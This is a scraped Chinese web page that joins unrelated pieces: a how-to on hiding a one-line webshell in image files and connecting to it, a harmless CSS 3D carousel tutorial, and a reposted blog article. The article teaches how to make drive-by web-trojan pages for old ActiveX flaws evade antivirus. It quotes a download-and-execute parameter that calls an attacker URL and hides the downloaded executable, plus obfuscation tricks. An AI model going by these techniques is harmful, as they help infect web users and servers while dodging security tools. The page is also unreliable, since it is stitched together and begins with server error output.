Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537
片馬:就是在圖片中隱藏一句話木馬。利用.htaccess等解析圖片為PHP或者asp文件。達到執行圖片內代碼目的
制作方法:
注意以下幾點:
將一個圖片以文本格式打開(這里用的notepad++.以記事本方式打開修改也能連接成功,不過修改后圖片無法正常顯示了),
后面粘貼上一句話木馬
上傳圖片
連接蟻劍,嗯,很好,連接成功
在windows的cmd中執行
可以看到末尾已經有一句話木馬了
上傳之后連接試試,成功
用winhex打開圖片,添加一句話木馬
上傳,連接成功
先打開圖片
點擊文件->文件簡介
添加木馬
上傳,連接成功
原文鏈接:https://www.cnblogs.com/Linkas/p/15101706.html
轉木馬
有些小伙伴0基礎小伙伴擔心,我沒有編程工具怎么辦?
這個不需要編程工具的,只需要找9張圖片改改名稱就行
(1) 新建一個文件夾
(2) 文件夾中新建img文件夾 以及一個txt文檔
(3) 把我放在下面的代碼粘貼到txt文檔中
(4)沒有txt后綴的這樣設置一下(這里以win11為例,點擊查看-->顯示-->文件擴展名)
(5)把文本文檔名稱改為旋轉木馬.html
(6)把圖片放在img文件夾里面,需要9張
(7)圖片重命名為 1.jpg 2.jpg 3.jpg 以此規律命名(200 x 300 像素的圖片)
(8)設置圖片像素(用win自帶照片軟件打開-->點擊... --> 重設大小-->自定義尺寸-->把寬度改成200、高度改成200-->保存)
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
<style>
*{
margin: 0;
padding: 0;
}
.box{
width: 200px;
height: 300px;
/* border: 1px solid black; */
margin: 50px auto;
position: relative;
/* 設置3D 效果 */
transform-style: preserve-3d;
/* 添加3D視距 透視效果 */
/* perspective: 300px; */
transform: rotateX(-15deg);
/* CSS animation動畫屬性
name 定義動畫名稱
duration 定義動畫執行時間 秒/單位
timing-function 定義動畫執行速度 linear 勻速
delay 定義動畫執行等待 秒/單位
iteration-count 定義動畫執行次數 默認為1 無限執行 infinite
animation-play-state 動畫運行狀態控制 默認running運行 paused 暫停
*/
/* animation: name duration timing-function delay iteration-count direction fill-mode; */
animation: move 10s linear infinite;
}
/* 定義關鍵幀動畫 執行我們定義的動畫 */
@keyframes move{
0%{
/* 在CSS3 變幻屬性中 如果要給一個元素添加多個變幻屬性
需要將所有的變幻屬性都寫在transform
*/
transform:rotateX(-15deg) rotateY(0deg);
}
100%{
transform:rotateX(-15deg) rotateY(360deg);
}
}
/* :hover 偽類選擇器 設置用戶鼠標移入時的效果 */
.box:hover{
/* 當用戶鼠標移入時 動畫由默認的運行狀態變成暫停 */
animation-play-state: paused;
}
.box div{
position: absolute;
left: 0;
top: 0;
width: 200px;
height: 300px;
margin-top: 50px;
}
/* :nth-child(1) */
.box div:nth-child(1){
/* 改變頁面第一張圖片 變幻屬性
transform 變幻屬性
rotate 旋轉
translate 位移
*/
transform: rotateY(40deg) translateZ(275px);
}
.box div:nth-child(2){
transform: rotateY(80deg) translateZ(275px);
}
.box div:nth-child(3){
transform: rotateY(120deg) translateZ(275px);
}
.box div:nth-child(4){
transform: rotateY(160deg) translateZ(275px);
}
.box div:nth-child(5){
transform: rotateY(200deg) translateZ(275px);
}
.box div:nth-child(6){
transform: rotateY(240deg) translateZ(275px);
}
.box div:nth-child(7){
transform: rotateY(280deg) translateZ(275px);
}
.box div:nth-child(8){
transform: rotateY(320deg) translateZ(275px);
}
.box div:nth-child(9){
transform: rotateY(360deg) translateZ(275px);
}
</style>
</head>
<body>
<div class="box">
<div>
<img src="./img/1.jpg" alt="">
</div>
<div>
<img src="./img/2.jpg" alt="">
</div>
<div>
<img src="./img/3.jpg" alt="">
</div>
<div>
<img src="./img/4.jpg" alt="">
</div>
<div>
<img src="./img/5.jpg" alt="">
</div>
<div>
<img src="./img/6.jpg" alt="">
</div>
<div>
<img src="./img/7.jpg" alt="">
</div>
<div>
<img src="./img/8.jpg" alt="">
</div>
<div>
<img src="./img/9.jpg" alt="">
</div>
</div>
</body>
</html>
上一篇:ABB機器人Sockets通訊
近一段時間,很多國內知名的應用程序都出現了很嚴重的安全漏洞,而這些漏洞的運用方法也都出奇地一致——網頁木馬。可是網頁木馬和木馬程序一樣,一經推出就會很快被殺毒軟件所查殺。關于木馬程序的免殺已經介紹過很多了,今天就來看看網頁木馬是如何進行免殺制作的。
一.百度搜索網頁木馬
百度搜霸漏洞是由于BaiduBar.dll ActiveX控件中存在一個可以供遠程代碼執行的高危漏洞。運行百度搜霸漏洞網頁木馬生成器來創建一個自己需要的網頁木馬文件。分別利用瑞星和卡巴斯基對這個文件進行查殺,發現目前只有瑞星可以對這個文件進行查殺。
現在我們就利用常見的源代碼折半法來進行文件特征碼的尋找井進行查殺,所謂源代碼折半法,就是把源代碼從中一分為二,接替來查看哪一部分代碼被殺,如果發現兩層以上的特征碼再將這段分開,然后依次類推縮小范圍,最終找到文件中特征碼的所在位置,這也是網頁木馬免殺最常用的檢測方法。
由于百度搜霸網頁木馬的代碼很少很清晰,因此制作免殺起來還是有一定的難度的,所以我們只能從文件代碼中間進行修改操作。舉個例子,比如說“( "http://www.weixanmanbu.com/cak.cab","muma .exe",0)”,這段代碼是網頁木馬先利用DloadDS()函數下載CAB文件,然后在本地將其轉化為可執行文件再運行,在這段代碼最后有一個參數0,它的作用就是讓下載的文件不顯示給用戶。我們只需要把參數0改為1,網頁木馬文件就可以起到免殺的效果了。不過問題也隨之而來了,改成1后網頁木馬會彈出一個提示窗口,這個樣子很容易被發現并引起用戶的懷疑。那應該怎么辦呢?其實操作起來很簡單。我們只需要將參數0改為00,就可以輕易的躲過瑞星殺毒軟件的檢測。
二.PPStream網頁木馬
PPStream網頁木馬是通過PPStream的堆棧溢出產生的。首先還是通過PPStream漏洞生成器來創建一個網頁木馬文件,接著通過金山毒霸對其進行查殺,毋庸置疑已經被查殺了。我們還是先通過源代碼折半法來確定特征碼的位置,經過測試發現特征碼處于<objeot id="ppc" Classid=”CLSID:5EC7C511-CDOF-42E6-830C-1BD9882F3458">這段中。其實制作過免殺網頁木馬的用戶一眼就可以看出,問題一定是在ppc這個參數里面,因為參數從來就是殺毒軟件特征碼的提取內容。我們將ppc改為duba,然后網頁木馬文件就免殺了。不過需要大家注意的是,這段代碼和后面的是相連的,因此只要使用ppc參數的,就需要改成duba才可以。這個方法對于其它的殺毒軟件,比如瑞星也可以起到免殺的效果。
三.暴風影音網頁木馬
暴風影音網頁木馬是由于暴風影音II中mps.dll組件多個緩沖區溢出漏洞造成的,也是近期非常熱門的一個軟件漏洞。創建好我們的網頁木馬后進仟查殺,發現很多殺毒軟件都能夠將其查殺。同樣通過路改參數就可以避過金山毒霸的查殺,但卻無法過瑞星和卡巴斯基。
我們找到memory=new Array();,接著在其下面添加一句google=memory。本來變量memory是直接轉向new Array()的,現在我們在中間添加了一句新的代碼,這樣就讓google先轉到變量memory,然后再從memory轉向new Array()。實際上就是讓代碼多走了一步路,這在程序中本來是不應該存在的,這么做就相當于在網頁代碼里而添加了一段花指令。保存修改后再查殺網頁木馬文件,發現已經通過了瑞星的檢測。
網頁木馬的免殺除了這種修改源代碼的方法外。還可以利用代碼加密的方法來進行免殺操作。網頁木馬的加密方法有很多,常用的就是微軟的JScript.Encode腳本來加密,當然用戶自己編寫加密函數效果會更好。現在同上這種在線進行JScript.Encode加密解密的網頁也有很多,只需要將網頁木馬源代碼粘貼在網頁的輸入框內,接著按“Encodc解密”按鈕就可以了。需要用戶注意的是,加密時應該只對腳本部分進行加密,不需要對<script language="">腳本標記進行加密,并且加密后腳本標記應該改為<script language ="JScript.Encode">。
到此為止,關于網頁木馬免殺的相關內容就為大家介紹到這兒,從上面的介紹我們可以看到,網頁木馬免殺的方法相對于可執行文件來說還是非常有限的。不過用戶只需要利用好過有限的方法,就可以將網頁木馬隱形于眾多的殺毒軟件面前,當然這種方法也適用于ASP、PHP這樣的網頁木馬。
本文來自 危險漫步博客 轉載請注明;
本文地址:http://www.weixianmanbu.com/article/1143.html
*請認真填寫需求信息,我們會在24小時內與您取得聯系。